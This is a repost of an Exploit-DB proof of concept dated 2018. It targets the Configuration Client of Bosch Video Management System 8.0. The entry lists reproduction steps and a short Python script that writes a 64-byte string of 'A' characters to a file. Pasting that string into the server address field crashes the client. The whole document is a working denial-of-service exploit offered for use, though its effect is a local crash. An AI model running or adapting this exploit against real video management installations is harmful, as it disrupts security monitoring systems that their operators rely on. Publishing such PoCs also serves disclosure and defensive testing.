Bosch Video Management System 8.0 – Configuration Client Denial of Service (PoC) - 体验盒子

作者： Daniel

日期： 2018-11-14

类别：

dos

平台：

windows

来源：https://www.exploit-db.com/exploits/45859/

# Exploit Title: Bosch Video Management System 8.0-Configuration Client-Denial of Service (Poc)
# Discovery by: Daniel
# Discovery Date: 2018-11-12
# Software Name: Bosch Video Management System
# Software Version: 8.0
# Vendor Homepage: https://www.boschsecurity.com/xc/en/products/management-software/bvms/
# Software Link: https://la.boschsecurity.com/es/productos/videosystems_1/videosoftware_1/videomanagementsystems_1/boschvideomanagementsyste_8/boschvideomanagementsyste_8_44761
# Tested on: Windows 10 Pro x64

#Make sure that during the installation of software you installed all the program features available.
#This PoC was carried out in 'Configuration Client', which is part of 'Bosch Video Management System'.

# Steps to produce the crash:
# 1.- run: dos.py
# 2.- Open bosch.txt and copy content to clipboard
# 2.- Open Configuration Client (Normally the installer creates a direct link in desktop)
# 3.- Click on 'Connection:' box and select "Address Book"
# 4.- Copy clipboard in "(Enterprise) Management Server Address:"
# 5.- write "test" in 'Username'
# 6.- Write "test" in 'Password'
# 7.- Click on 'OK'
# 8.- Crash


#!/usr/bin/python

buf = "\x41" * 64
f = open('bosch.txt', 'w')
f.write(buf)
f.close()